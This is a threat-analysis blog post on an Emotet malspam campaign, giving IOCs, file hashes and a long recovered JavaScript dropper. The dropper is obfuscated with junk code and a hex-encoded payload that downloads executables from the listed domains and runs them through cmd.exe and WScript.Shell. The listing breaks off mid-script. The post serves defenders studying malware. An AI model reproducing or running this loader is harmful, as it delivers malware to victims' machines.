2017-07-03 Malspam Leading To Geodo/Emotet Malware

This write up stems from a user getting a malicious Word document via an email for an invoice. Running the PCAP file through Network Total, I saw that that this was tagged as Geodo/Emotet malware. Googling around for Emotet, I came across a Forcepoint article in which they did a great walk-through which you can read about here. Their article seems to cover most of what I was seeing from the network traffic perspective. Fortinet has two more articles (https://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 and https://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-2) that goes into really good detail about how this malware works.

For the artifacts from this investigation, check out my Github repo here.

IOCs:
=====
192.190.86.56 / internetcheapskate[.]com (TCP / 80)
173.243.126.142 (TCP / 443)
50.21.183.63 (TCP / 443)
72.10.49.171 (TCP 8080)
50.3.75.246 (TCP / 443)
195.8.196.29/ getsomeskillz[.]co[.]uk
210.1.58.39 / hygienic[.]co[.]th
91.109.6.212 / mclelland[.]net
64.90.49.44 / thetrillium[.]com

Artifacts:
==========
File name: INV 00000865.doc
File size: 36KB
MD5 hash: a1a76c1703030b3b3bcd1d15e32fb7a6
Virustotal: https://virustotal.com/en/file/922be0a8f0bb146e0fe6cbd5b3fa573980bf39572412cbc25f71cd0eb17fdd4f/analysis/
First Detected: 2017-06-30 07:28:49 UTC
Detection Ratio: 26 / 58
Malwr: https://malwr.com/analysis/ZDVhZGQ0MGQxOGI2NDM5ZTk4NzdhZjZlY2VlMDIxYjg/
Hybrid Analysis: https://www.hybrid-analysis.com/sample/922be0a8f0bb146e0fe6cbd5b3fa573980bf39572412cbc25f71cd0eb17fdd4f?environmentId=100

File name: 191599710.bin
File size: 60KB
MD5 hash: b552c54bf0047a430a285458cfa60a43
Virustotal: https://virustotal.com/en/file/bae6fec196f39c616720f4dd4296b53abf13a11d30f633ff7ddf55c3cba50ce2/analysis/
First Detected: 2017-06-30 09:54:26 UTC
Detection Ratio: 18 / 57
Malwr: NA
Hybrid Analysis: NA

File name: da241556.aoo
File size: 231KB
MD5 hash: 0e83d4d2f0d0fd1aee4e6bc4a1b05593
Virustotal: https://virustotal.com/en/file/3433d1f2419393473b8f27844a44b4258a4d41899b58699efce332b722ddc8f8/analysis/
First Detected: 2017-06-30 16:25:20 UTC
Detection Ratio: 41 / 61
Malwr: NA
Hybrid Analysis: https://www.hybrid-analysis.com/sample/3433d1f2419393473b8f27844a44b4258a4d41899b58699efce332b722ddc8f8?environmentId=100

File name: GeneralizeMspthrd.exe / 771546.exe
File size: 223KB
MD5 hash: 83b7ce632ef064c0b5a7fc608a8904a8
Virustotal: https://virustotal.com/en/file/f07139724e01f7563afb0b5ffa28d94c74471bffc4c8a106c32c801ccb69b8a3/analysis/
First Detected: 2017-07-03 15:21:53 UTC
Detection Ratio: 31 / 63
Malwr: NA
Hybrid Analysis: https://www.hybrid-analysis.com/sample/f07139724e01f7563afb0b5ffa28d94c74471bffc4c8a106c32c801ccb69b8a3?environmentId=100
File name: EF21G~.jse
File size: 56KB
MD5 hash: 98977be182118ffe6ab4dd8b495578f3
Virustotal: https://virustotal.com/en/file/1ceaed57d8fe46275e454548eaf920538c4ce933832a10be260b752101dd03dd/analysis/
First Detected: 2017-06-30 08:12:23 UTC
Detection Ratio: 0 / 56
Malwr: NA
Hybrid Analysis: NA

Analysis:
=========
To be honest, there is not much to this infection. This Emotet infection started off with a user getting an email with a malicious Word document attached to it. The usual thing for most attackers is to use a macro in the Word document to kick off the infection. In this example this was not the case as there was no macro embedded in the Word document, but a malicious Java script instead.

I extracted out the Word document via 7zip and took a look around at the files there. I did not see the usual signs of a macro enabled Word document, but did find a BIN file in one of the folders labeled “embeddings” which seems to be where the script lived. I also noticed that within the “C:\Users\%username%\AppData\Local\Temp” folder, the Javascript file was copied there when the Word document was opened. Below is the Javascript from the %TEMP% folder cleaned up.

if (Math.round(445312818)) {} /*amqeaazjduqksoqaoa*/
if (loe()) {
    var iBF = function() {};
    iBF();

    function loe() {
        var AYJ = function() {};
        AYJ();
        var QM = function() {
            var AYJ = function() {};
            AYJ();
        };
        QM();
        var Pu = function() {
            return 'ebx'.lastIndexOf('e');
        };

        function Wef() {
            return Math.round(731173094);
        }
        var Ap = function() {
            return 'cwo';
        };
        for (var atb = 5; atb < 5; ++atb) {
            var AYJ = function() {};
            AYJ();
            var QM = function() {
                var AYJ = function() {};
                AYJ();
            };
            QM();
            var Pu = function() {
                return 'ebx'.lastIndexOf('e');
            };

            function Wef() {
                return Math.round(731173094);
            }
            var Ap = function() {
                return 'cwo';
            };
        }

        function ioz() {
            if ('poo'.search(/o/)) {}
            var zq = function() {
                return 'aur'.charAt(0);
            };

            function E2E() {
                return 'a'.charAt(0);
            }
            var AG1 = function() {
                return 625;
            };
            dae = new Date();
        }
        if (Math.round(209089940)) {}
        if ('ami'.lastIndexOf('a')) {
            if (Math.round(209089940)) {}
        }
        var pyu = ["zh", "f", ioz, "zh", "f"];
        if ('a'.slice(1, 1)) {}
        var tQ7 = function() {
            return 'l'.slice(1, 1);
        };

        function pFJ() {
            return 'o'.slice(1, 1);
        }
        var AF = function() {
            return 'kq'.lastIndexOf('k');
        };
        var omo = pyu[2];

        function Mti() {}
        Mti();
        omo();

        function AW() {}
        AW();

        function VY() {
            function AW() {}
            AW();
        }
        VY();
        if ('gw'.lastIndexOf('w')) {}
        if ('eu'.search(/u/)) {
            if ('gw'.lastIndexOf('w')) {}
        }

        function eed() {
            function YcE() {
                return 'mcu'.slice(1, 2);
            }
            for (var fol = 1; fol < 5; ++fol) {}
            fg = dae.toLocaleString();
            if (Math.round(512457952)) {}
            for (var iso = 2; iso < 3; ++iso) {
                if (Math.round(512457952)) {}
            }
        }

        function ab() {
            eed();
        }
        var epo = ab;
        epo();
        for (var oom = 5; oom < 5; ++oom) {}
        var NG = function() {
            return 'ojh'.search(/j/);
        };
        var Gp = function() {
            return 'w'.toLowerCase();
        };
        var oe = function() {
            for (var oom = 5; oom < 5; ++oom) {}
            var NG = function() {
                return 'ojh'.search(/j/);
            };
            var Gp = function() {
                return 'w'.toLowerCase();
            };
        };
        oe();
        var A2k = function() {
            return 'uk'.toLowerCase();
        };

        function aD() {
            return 'sam'.slice(3, 3);
        }
        var A1d = function() {
            return new Date();
        };

        function inx() {
            function xs() {
                return 'ilz'.concat('u');
            }

            function YG() {
                return 'nie'.slice(2, 2);
            }
            var vb = function() {
                return 'o'.search(/o/);
            };
            var AT = function() {};
            AT();
            for (var pne = 1; pne < 3; ++pne) {
                function xs() {
                    return 'ilz'.concat('u');
                }

                function YG() {
                    return 'nie'.slice(2, 2);
                }
                var vb = function() {
                    return 'o'.search(/o/);
                };
                var AT = function() {};
                AT();
            }
            nq = fg.toString();

            function xZ() {}
            xZ();
            var Vvz = function() {
                function xZ() {}
                xZ();
            };
            Vvz();
            for (var gf = 4; gf < 5; ++gf) {
                function xZ() {}
                xZ();
                var Vvz = function() {
                    function xZ() {}
                    xZ();
                };
                Vvz();
            }
            var T22 = function() {
                return Math.sqrt(495064435);
            };
        }
        var uo = ["ibo", "u", "ewu", inx, "ibo", "u", "ewu"];
        if (new Date()) {}
        for (var yii = 2; yii < 2; ++yii) {
            if (new Date()) {}
        }

        function Z0d() {
            return 'aa'.slice(1, 2);
        }

        function s2v() {
            return 'hj'.slice(1, 1);
        }
        var Pb = function() {
            return 'w'.charAt(0);
        };
        for (var fw = 5; fw < 5; ++fw) {
            if (new Date()) {}
            for (var yii = 2; yii < 2; ++yii) {
                if (new Date()) {}
            }
        }
        uo[3]();
        if (Math.sqrt(447994640)) {}

        function SL() {
            return 'aey'.slice(1, 1);
        }
        var eSR = function() {
            return 'us'.replace(/u/, 'u');
        };

        function mD() {
            return 'sie'.toLowerCase();
        }
        for (var cac = 3; cac < 5; ++cac) {}
        for (var ku = 5; ku < 5; ++ku) {
            for (var cac = 3; cac < 5; ++cac) {}
        }
        var At = function() {
            return 'q'.lastIndexOf('q');
        };
        var Fr = function() {
            return new Date();
        };

        function ofe() {
            if ('eh'.lastIndexOf('h')) {}
            var feo = "";
            feo += '2';
            for (var iya = 1; iya < 2; ++iya) {}
            if (new Date()) {
                for (var iya = 1; iya < 2; ++iya) {}
            }
            feo += '0';

            function N8l() {}
            N8l();

            function u5() {
                return 'rai'.toLowerCase();
            }
            var kY = function() {
                return 'hue'.concat('i');
            };
            if (79) {
                function N8l() {}
                N8l();
            }
            feo += '1';

            function w3() {}
            w3();

            function Yw() {
                function w3() {}
                w3();
            }
            Yw();

            function K() {
                function w3() {}
                w3();

                function Yw() {
                    function w3() {}
                    w3();
                }
                Yw();
            }
            K();
            feo += '7';
            if ('thf'.concat('uc')) {}
            if ('c'.toLowerCase()) {
                if ('thf'.concat('uc')) {}
            }
            auy = auy(nq, feo);
            if ('oa'.concat('op')) {}
        }

        function azo() {
            if ('r'.replace(/r/, 'r')) {}
            var MQ = function() {
                return 'ti'.toLowerCase();
            };
            for (var ios = 1; ios < 1; ++ios) {
                if ('r'.replace(/r/, 'r')) {}
                var MQ = function() {
                    return 'ti'.toLowerCase();
                };
            }
            ofe();
            if ('j'.search(/j/)) {}

            function Oxd() {
                return 'o'.charAt(0);
            }
            var WR = function() {
                return 'm'.concat('vzi');
            };

            function U9P() {
                return Math.sqrt(702390550);
            }
            if ('u'.slice(1, 1)) {
                if ('j'.search(/j/)) {}

                function Oxd() {
                    return 'o'.charAt(0);
                }
                var WR = function() {
                    return 'm'.concat('vzi');
                };

                function U9P() {
                    return Math.sqrt(702390550);
                }
            }
        }
        var Cae = function() {};
        Cae();
        azo();
        return auy;

        function N1() {}
        N1();
        if (Math.round(842596658)) {
            function N1() {}
            N1();
        }

        function zQ8() {
            return 'aa'.search(/a/);
        }
        var Ko8 = function() {
            return new Date();
        };

        function Az() {
            return 'cw'.replace(/w/, 'c');
        }
        if (814) {
            function N1() {}
            N1();
            if (Math.round(842596658)) {
                function N1() {}
                N1();
            }
        }
    }

    function auy(srr, iks) {
        function AUT() {
            return 'ipk'.concat('box');
        }
        var A6 = function() {
            return 'o'.toLowerCase();
        };

        function U() {
            return 'ui'.search(/u/);
        }
        var wVP = function() {};
        wVP();
        return srr.match(iks);
        var ATJ = function() {};
        ATJ();
    }

    function wVm() {}
    wVm();

    function m5C() {
        return 'kud'.search(/u/);
    }
    var XEy = function() {
        function wVm() {}
        wVm();
    };
    XEy();
    var rhj = "";
    for (var seq = 5; seq < 5; ++seq) {}

    function Ad() {
        return 'hmd'.search(/h/);
    }

    function eeq() {
        return 'tz'.concat('gp');
    }
    var gI = function() {
        return 'xd'.charAt(1);
    };
    for (var asm = 3; asm < 5; ++asm) {
        for (var seq = 5; seq < 5; ++seq) {}
    }
    rhj += '0A76617220616F203D205B2022687474703A2F2F6';
    var y6M = function() {
        return new Date();
    };
    var zh = function() {
        return 'eeu'.lastIndexOf('u');
    };

    function wpL() {}
    wpL();
    for (var ihm = 5; ihm < 5; ++ihm) {
        var y6M = function() {
            return new Date();
        };
        var zh = function() {
            return 'eeu'.lastIndexOf('u');
        };

        function wpL() {}
        wpL();
    }
    if (962) {
        var y6M = function() {
            return new Date();
        };
        var zh = function() {
            return 'eeu'.lastIndexOf('u');
        };

        function wpL() {}
        wpL();
        for (var ihm = 5; ihm < 5; ++ihm) {
            var y6M = function() {
                return new Date();
            };
            var zh = function() {
                return 'eeu'.lastIndexOf('u');
            };

            function wpL() {}
            wpL();
        }
    }
    rhj += '76574736F6D65';
    var jK = function() {
        return 25;
    };
    var RA = function() {
        return 'iie'.lastIndexOf('i');
    };

    function JK() {
        return Math.round(390071800);
    }

    function uA() {}
    uA();
    rhj += '736B696C6C7A2E636F2';

    function Vj6() {}
    Vj6();

    function sq() {
        return 202;
    }
    rhj += 'E756B2F73632F';

    function Rn() {}
    Rn();
    for (var ekk = 5; ekk < 5; ++ekk) {
        function Rn() {}
        Rn();
    }
    for (var jio = 4; jio < 4; ++jio) {
        function Rn() {}
        Rn();
        for (var ekk = 5; ekk < 5; ++ekk) {
            function Rn() {}
            Rn();
        }
    }
    rhj += '222C22687474703';

    function A1p() {}
    A1p();
    var V = function() {
        return 'h';
    };
    rhj += 'A2F2F696E7465726E6574636865';
    if ('u'.charAt(0)) {}
    rhj += '6170736B6174652E636F6D2F65';
    var A7 = function() {};
    A7();
    for (var yfu = 3; yfu < 3; ++yfu) {
        var A7 = function() {};
        A7();
    }
    for (var og = 1; og < 2; ++og) {
        var A7 = function() {};
        A7();
        for (var yfu = 3; yfu < 3; ++yfu) {
            var A7 = function() {};
            A7();
        }
    }
    rhj += '7A';
    rhj += '656F66626877792F222C22687474703A2F2F68796769656E6';
    rhj += '9632E636F2E74682F706C7567696';
    rhj += 'E732F757365722F63706366';
    rhj += '657268656E2F222C2268';
    var AZo = function() {};
    AZo();
    rhj += '7474703A2F2F6D636C6';
    var iie = function() {
        return 'aee'.lastIndexOf('e');
    };

    function YI2() {
        return new Date();
    }
    for (var oy = 1; oy < 2; ++oy) {}
    var Edy = function() {
        var iie = function() {
            return 'aee'.lastIndexOf('e');
        };

        function YI2() {
            return new Date();
        }
        for (var oy = 1; oy < 2; ++oy) {}
    };
    Edy();
    var Kul = function() {
        return 'e'.search(/e/);
    };
    var LP = function() {
        return 'ooo'.search(/o/);
    };
    var TS4 = function() {
        return 'jhg'.replace(/g/, 'j');
    };
    rhj += '56C6C616E642E6E65742F65796B696A6C616968772F222C22';
    var PvJ = function() {};
    PvJ();
    var A4y = function() {
        return Math.round(538289171);
    };
    var cal = function() {
        return 'ii';
    };
    var Zwb = function() {
        return 'rel'.search(/r/);
    };
    rhj += '687474703A2F';
    var Scd = function() {};
    Scd();
    var X9 = function() {
        return Math.round(869534154);
    };
    rhj += '2F7468657472696C6C69756D2E636F6D2F71747672';
    if (Math.round(159493726)) {}
    rhj += '7';
    var JHE = function() {};
    JHE();
    if (Math.round(242692711)) {
        var JHE = function() {};
        JHE();
    }
    var Iq = function() {
        return 'yd';
    };

    function AC() {
        return new Date();
    }
    var Xk = function() {
        return 'aos'.charAt(2);
    };
    for (var aay = 1; aay < 4; ++aay) {
        var JHE = function() {};
        JHE();
        if (Math.round(242692711)) {
            var JHE = function() {};
            JHE();
        }
    }
    rhj += '4676A656D2F22205D3B';
    var IZ = function() {};
    IZ();
    var tJJ = function() {
        return Math.round(548425595);
    };
    var ht8 = function() {
        return 'ikt'.search(/k/);
    };
    rhj += '0A0A66756E63746';
    if (Math.sqrt(95814050)) {}
    for (var eb = 5; eb < 5; ++eb) {
        if (Math.sqrt(95814050)) {}
    }
    if ('b'.slice(1, 1)) {
        if (Math.sqrt(95814050)) {}
        for (var eb = 5; eb < 5; ++eb) {
            if (Math.sqrt(95814050)) {}
        }
    }
    var AMP = function() {
        return 'ubv';
    };
    var qN3 = function() {
        return 'roi'.search(/r/);
    };

    function A2v() {
        return 'ugk'.slice(3, 3);
    }
    rhj += '96F6E20756';
    if (new Date()) {}
    var OX = function() {
        if (new Date()) {}
    };
    OX();
    var XAH = function() {
        return 'ish'.concat('ouw');
    };

    function Wc() {
        return 'nt'.lastIndexOf('t');
    }
    if ('ion'.toLowerCase()) {
        if (new Date()) {}
        var OX = function() {
            if (new Date()) {}
        };
        OX();
    }
    rhj += '928206D756B2C207569752';
    for (var fua = 5; fua < 5; ++fua) {}
    for (var ili = 4; ili < 4; ++ili) {
        for (var fua = 5; fua < 5; ++fua) {}
    }
    for (var tsm = 1; tsm < 5; ++tsm) {
        for (var fua = 5; fua < 5; ++fua) {}
        for (var ili = 4; ili < 4; ++ili) {
            for (var fua = 5; fua < 5; ++fua) {}
        }
    }
    var hq = function() {
        return 'x'.concat('e');
    };

    function zn() {
        return Math.round(270424643);
    }
    rhj += '0290A7B0A2020202072657475726E204D6174682E666C6F6F7';
    var AM = function() {};
    AM();
    if ('w'.charAt(0)) {
        var AM = function() {};
        AM();
    }
    var p8 = function() {
        return 'eei'.search(/e/);
    };
    for (var ee = 2; ee < 2; ++ee) {
        var AM = function() {};
        AM();
        if ('w'.charAt(0)) {
            var AM = function() {};
            AM();
        }
        var p8 = function() {
            return 'eei'.search(/e/);
        };
    }
    rhj += '228204D6174682E72616E646F6D2829202A';
    if (952) {}

    function KI() {
        if (952) {}
    }
    KI();
    if ('auf'.replace(/a/, 'f')) {
        if (952) {}

        function KI() {
            if (952) {}
        }
        KI();
    }
    rhj += '2028756975202D206D756';

    function i5P() {
        return new Date();
    }

    function ME() {
        return Math.round(892861596);
    }

    function S6() {
        return 'uei'.slice(1, 1);
    }

    function mK() {}
    mK();
    var AWD = function() {
        function i5P() {
            return new Date();
        }

        function ME() {
            return Math.round(892861596);
        }

        function S6() {
            return 'uei'.slice(1, 1);
        }

        function mK() {}
        mK();
    };
    AWD();
    var yzg = function() {
        return new Date();
    };

    function Q() {
        return 'vxf'.concat('hte');
    }

    function eG() {
        function i5P() {
            return new Date();
        }

        function ME() {
            return Math.round(892861596);
        }

        function S6() {
            return 'uei'.slice(1, 1);
        }

        function mK() {}
        mK();
        var AWD = function() {
            function i5P() {
                return new Date();
            }

            function ME() {
                return Math.round(892861596);
            }

            function S6() {
                return 'uei'.slice(1, 1);
            }

            function mK() {}
            mK();
        };
        AWD();
        var yzg = function() {
            return new Date();
        };

        function Q() {
            return 'vxf'.concat('hte');
        }
    }
    eG();
    rhj += 'B202B2031292029202B206D756B';

    function Z3() {}
    Z3();
    for (var nga = 5; nga < 5; ++nga) {
        function Z3() {}
        Z3();
    }
    for (var bs = 5; bs < 5; ++bs) {
        function Z3() {}
        Z3();
        for (var nga = 5; nga < 5; ++nga) {
            function Z3() {}
            Z3();
        }
    }
    rhj += '3B0A7D0A0A66756';

    function AA() {
        return 'q'.search(/q/);
    }
    for (var sxh = 3; sxh < 3; ++sxh) {}
    var Z4 = function() {
        return 'o'.lastIndexOf('o');
    };

    function Kl() {
        return Math.round(353084983);
    }

    function cpA() {
        return 255;
    }
    var A5 = function() {
        function AA() {
            return 'q'.search(/q/);
        }
        for (var sxh = 3; sxh < 3; ++sxh) {}
    };
    A5();
    rhj += 'E637469';

    function tcE() {}
    tcE();

    function dk() {
        return 'ea'.search(/e/);
    }
    var PTR = function() {
        return 687;
    };
    rhj += '6F6E2079656928290A7B0A2020202076';
    rhj += '617220616962203D2075692820';
    var WT = function() {};
    WT();
    var Qw = function() {
        return new Date();
    };

    function Ab2() {
        return 192;
    }
    if (967) {
        var WT = function() {};
        WT();
        var Qw = function() {
            return new Date();
        };

        function Ab2() {
            return 192;
        }
    }
    rhj += '302C20616F2E6C656E677468202D203120293B0A2';
    var AhV = function() {
        return 'boo'.slice(3, 3);
    };

    function IX() {}
    IX();

    function js() {
        var AhV = function() {
            return 'boo'.slice(3, 3);
        };

        function IX() {}
        IX();
    }
    js();
    rhj += '0202020766172';
    for (var dah = 1; dah < 2; ++dah) {}
    for (var oki = 5; oki < 5; ++oki) {
        for (var dah = 1; dah < 2; ++dah) {}
    }
    if ('o'.concat('io')) {
        for (var dah = 1; dah < 2; ++dah) {}
        for (var oki = 5; oki < 5; ++oki) {
            for (var dah = 1; dah < 2; ++dah) {}
        }
    }
    rhj += '206F78203D20616F5B20616962205D3B0A202';
    for (var mei = 5; mei < 5; ++mei) {}
    rhj += '02020';
    var Aqn = function() {
        return 'ehg'.slice(2, 2);
    };
    var xG = function() {};
    xG();
    rhj += '616F2E7';
    var AHE = function() {
        return 'osw'.slice(3, 3);
    };

    function Xp() {
        return new Date();
    }

    function UVo() {
        return new Date();
    }
    if ('ae'.lastIndexOf('e')) {}
    if (Math.round(230357487)) {
        var AHE = function() {
            return 'osw'.slice(3, 3);
        };

        function Xp() {
            return new Date();
        }

        function UVo() {
            return new Date();
        }
        if ('ae'.lastIndexOf('e')) {}
    }
    for (var tnk = 5; tnk < 5; ++tnk) {
        var AHE = function() {
            return 'osw'.slice(3, 3);
        };

        function Xp() {
            return new Date();
        }

        function UVo() {
            return new Date();
        }
        if ('ae'.lastIndexOf('e')) {}
        if (Math.round(230357487)) {
            var AHE = function() {
                return 'osw'.slice(3, 3);
            };

            function Xp() {
                return new Date();
            }

            function UVo() {
                return new Date();
            }
            if ('ae'.lastIndexOf('e')) {}
        }
    }
    rhj += '3706C69636528206169622C203120';
    if (new Date()) {}
    var SoX = function() {
        return 'i'.replace(/i/, 'i');
    };
    if (576) {
        if (new Date()) {}
    }
    rhj += '293B0A2';
    var EQ = function() {};
    EQ();
    for (var mxl = 3; mxl < 4; ++mxl) {
        var EQ = function() {};
        EQ();
    }
    var wGm = function() {
        return 'u'.replace(/u/, 'u');
    };
    var fTV = function() {
        return 'a'.replace(/a/, 'a');
    };
    var Ajt = function() {
        return 'uns'.replace(/n/, 's');
    };
    var eBJ = function() {
        var EQ = function() {};
        EQ();
        for (var mxl = 3; mxl < 4; ++mxl) {
            var EQ = function() {};
            EQ();
        }
        var wGm = function() {
            return 'u'.replace(/u/, 'u');
        };
        var fTV = function() {
            return 'a'.replace(/a/, 'a');
        };
        var Ajt = function() {
            return 'uns'.replace(/n/, 's');
        };
    };
    eBJ();

    function qPG() {
        return 'ro'.toLowerCase();
    }
    var AiK = function() {
        return new Date();
    };
    rhj += '020202072657475726E2028206';
    for (var aig = 3; aig < 3; ++aig) {}
    if (new Date()) {
        for (var aig = 3; aig < 3; ++aig) {}
    }
    rhj += 'F78203D3D20756E646566696E65642029203F20666';
    rhj += '16C7365203A206F783B0A7D0A0A66';
    for (var qq = 2; qq < 4; ++qq) {}

    function SG1() {
        return 'bu'.concat('ioa');
    }
    var y7 = function() {
        return Math.round(106855681);
    };
    if ('ybc'.concat('j')) {
        for (var qq = 2; qq < 4; ++qq) {}

        function SG1() {
            return 'bu'.concat('ioa');
        }
        var y7 = function() {
            return Math.round(106855681);
        };
    }
    var tV = function() {
        return 'uci'.search(/c/);
    };

    function aA() {
        return 'bnr'.slice(1, 1);
    }

    function dBF() {
        return 'eai'.slice(3, 3);
    }
    if (new Date()) {
        for (var qq = 2; qq < 4; ++qq) {}

        function SG1() {
            return 'bu'.concat('ioa');
        }
        var y7 = function() {
            return Math.round(106855681);
        };
        if ('ybc'.concat('j')) {
            for (var qq = 2; qq < 4; ++qq) {}

            function SG1() {
                return 'bu'.concat('ioa');
            }
            var y7 = function() {
                return Math.round(106855681);
            };
        }
        var tV = function() {
            return 'uci'.search(/c/);
        };

        function aA() {
            return 'bnr'.slice(1, 1);
        }

        function dBF() {
            return 'eai'.slice(3, 3);
        }
    }
    rhj += '756E6374696F6';
    if ('ee'.search(/e/)) {}
    for (var eeu = 4; eeu < 5; ++eeu) {
        if ('ee'.search(/e/)) {}
    }
    rhj += 'E206B696F28290A7B0A202020207661722075';
    for (var dye = 2; dye < 3; ++dye) {}
    rhj += '62203D206E657720416374697665';
    for (var di = 2; di < 3; ++di) {}
    if ('ir'.charAt(0)) {
        for (var di = 2; di < 3; ++di) {}
    }
    rhj += '584F626A656374282022536372697074696E67';
    for (var iid = 5; iid < 5; ++iid) {}

    function Wh() {
        return 162;
    }

    function vgs() {
        return 103;
    }
    for (var eqi = 1; eqi < 1; ++eqi) {
        for (var iid = 5; iid < 5; ++iid) {}
    }
    rhj += '2E46696C6553797374656D4F626A656374';
    for (var vwe = 1; vwe < 5; ++vwe) {}
    var wnK = function() {
        return Math.round(146689053);
    };
    for (var uae = 1; uae < 2; ++uae) {
        for (var vwe = 1; vwe < 5; ++vwe) {}
        var wnK = function() {
            return Math.round(146689053);
        };
    }
    rhj += '2220292E476';
    rhj += '574537065636961';

    function yT() {
        return 'p'.charAt(0);
    }

    function Qq() {}
    Qq();
    rhj += '6C466F6C6465722820322';
    if (32) {}

    function fsV() {
        return new Date();
    }
    var ZV7 = function() {
        return 'aj'.charAt(0);
    };
    rhj += '0293B0A2020202076';
    for (var zgu = 4; zgu < 5; ++zgu) {}

    function nyK() {
        return 'oj';
    }
    for (var uuk = 2; uuk < 3; ++uuk) {
        for (var zgu = 4; zgu < 5; ++zgu) {}

        function nyK() {
            return 'oj';
        }
    }

    function CI() {
        return 'oei'.toLowerCase();
    }
    if ('ou'.toLowerCase()) {
        for (var zgu = 4; zgu < 5; ++zgu) {}

        function nyK() {
            return 'oj';
        }
        for (var uuk = 2; uuk < 3; ++uuk) {
            for (var zgu = 4; zgu < 5; ++zgu) {}

            function nyK() {
                return 'oj';
            }
        }

        function CI() {
            return 'oei'.toLowerCase();
        }
    }
    rhj += '6172206269203D20222F646122202B20';
    var WLo = function() {};
    WLo();
    rhj += '75692820302C';
    if (new Date()) {}

    function Wz() {
        if (new Date()) {}
    }
    Wz();
    rhj += '203939393939392029202B20222E616F6F223B0A2020';
    for (var wiu = 3; wiu < 5; ++wiu) {}
    for (var apl = 1; apl < 2; ++apl) {
        for (var wiu = 3; wiu < 5; ++wiu) {}
    }
    rhj += '20207265747';
    for (var hxo = 1; hxo < 5; ++hxo) {}
    rhj += '5726E207562202B2062693B0A7D0A0A';
    rhj += '66756E6374696F6E207A6B722820616120290A7B0A20202';
    rhj += '020766172206969';

    function xE() {}
    xE();
    rhj += '203D206E657720416374697665584F62';
    rhj += '6A65637428202257';
    if (286) {}

    function vt() {
        return 'u'.charAt(0);
    }
    var PU = function() {
        return new Date();
    };
    var AHO = function() {
        return 'u'.lastIndexOf('u');
    };
    if (new Date()) {
        if (286) {}

        function vt() {
            return 'u'.charAt(0);
        }
        var PU = function() {
            return new Date();
        };
        var AHO = function() {
            return 'u'.lastIndexOf('u');
        };
    }
    rhj += '536372697';
    for (var ffm = 2; ffm < 4; ++ffm) {}
    rhj += '0742E5368656C6C2220293B0A202020207661722';
    if ('u'.charAt(0)) {}
    if ('iod') {
        if ('u'.charAt(0)) {}
    }
    var vd = function() {
        return Math.round(45561718);
    };
    for (var ukn = 4; ukn < 5; ++ukn) {
        if ('u'.charAt(0)) {}
        if ('iod') {
            if ('u'.charAt(0)) {}
        }
        var vd = function() {
            return Math.round(45561718);
        };
    }
    var hQv = function() {
        return 'io'.replace(/o/, 'i');
    };
    rhj += '068696B203D2027636D642E657865202F63202227202';
    if ('a'.slice(1, 1)) {}
    for (var okb = 2; okb < 2; ++okb) {
        if ('a'.slice(1, 1)) {}
    }
    rhj += 'B206';
    var JIa = function() {};
    JIa();
    rhj += '161202B202722273B0A2020202076617220796973203D2';

    function AzO() {}
    AzO();
    for (var iy = 1; iy < 1; ++iy) {
        function AzO() {}
        AzO();
    }

    function gv() {
        return 'and'.charAt(1);
    }

    function AWg() {
        return new Date();
    }
    var d1x = function() {
        return 'e'.slice(1, 1);
    };
    var A3 = function() {
        return new Date();
    };

    function A44() {
        return 'uh'.lastIndexOf('u');
    }
    if (Math.round(908244070)) {
        function AzO() {}
        AzO();
        for (var iy = 1; iy < 1; ++iy) {
            function AzO() {}
            AzO();
        }

        function gv() {
            return 'and'.charAt(1);
        }

        function AWg() {
            return new Date();
        }
    }
    rhj += '069692E52756E282068696B2C2066616';
    for (var ah = 1; ah < 1; ++ah) {}
    if ('ua'.lastIndexOf('u')) {
        for (var ah = 1; ah < 1; ++ah) {}
    }
    rhj += 'C736520293B0A202020200A202020207D0A0A66756E6374696';
    rhj += 'F6E2078616F28207075772C20616120290A7B0A202';
    rhj += '02020736F6';

    function tK9() {}
    tK9();
    var bT = function() {
        return 'ua'.slice(1, 1);
    };
    rhj += 'A2E4F7';

    function An7() {}
    An7();
    rhj += '0656E28293B0A20202020736F6A2E54';
    var jUI = function() {
        return 'mli'.lastIndexOf('i');
    };
    var QS = function() {
        return Math.round(285725095);
    };
    var IOr = function() {
        return Math.round(40131064);
    };
    if ('ay'.charAt(1)) {}
    rhj += '797065203D20313B0A202';
    for (var aam = 5; aam < 5; ++aam) {}
    for (var uah = 1; uah < 2; ++uah) {
        for (var aam = 5; aam < 5; ++aam) {}
    }

    function oAA() {
        return 'q'.search(/q/);
    }

    function wqx() {
        return 'oar'.lastIndexOf('a');
    }
    var Ef = function() {
        return 943;
    };
    var V9f = function() {
        return 'auk'.toLowerCase();
    };
    if ('nc'.search(/c/)) {
        for (var aam = 5; aam < 5; ++aam) {}
        for (var uah = 1; uah < 2; ++uah) {
            for (var aam = 5; aam < 5; ++aam) {}
        }

        function oAA() {
            return 'q'.search(/q/);
        }
    }
    rhj += '02020736F6A2E5772697465282070757720293B0A20202020';
    for (var yez = 1; yez < 2; ++yez) {}
    if (new Date()) {
        for (var yez = 1; yez < 2; ++yez) {}
    }
    if (Math.sqrt(549801476)) {
        for (var yez = 1; yez < 2; ++yez) {}
        if (new Date()) {
            for (var yez = 1; yez < 2; ++yez) {}
        }
    }
    rhj += '736F6A2E506F736974696F6E203D2030';
    if ('s'.search(/s/)) {}

    function Hy() {
        return 'ata'.lastIndexOf('a');
    }
    if (565) {
        if ('s'.search(/s/)) {}
    }
    if ('ut'.slice(2, 2)) {
        if ('s'.search(/s/)) {}

        function Hy() {
            return 'ata'.lastIndexOf('a');
        }
        if (565) {
            if ('s'.search(/s/)) {}
        }
    }
    rhj += '3B0A20202020736';
    if (Math.round(198825890)) {}
    var xu = function() {
        if (Math.round(198825890)) {}
    };
    xu();
    if (Math.round(827207168)) {
        if (Math.round(198825890)) {}
        var xu = function() {
            if (Math.round(198825890)) {}
        };
        xu();
    }
    rhj += 'F6A2E53617665546F46696C65282061612C20322029';
    rhj += '3B0A20202020736F6A2E436C6F7365282';
    for (var rgu = 2; rgu < 3; ++rgu) {}
    rhj += '93B0A7D0A0A66756E6374696F6E206F757128';
    rhj += '20656A20290A7B0A202';
    rhj += '0202072657475726E20656A2E726573706F6E736554657874';
    var EjT = function() {
        return new Date();
    };
    var ASA = function() {
        return 24;
    };
    var Gbo = function() {
        return new Date();
    };
    var Ab = function() {};
    Ab();
    rhj += '2';
    rhj += 'E6D6174636828202F5E4D5A2';

    function Dw() {}
    Dw();
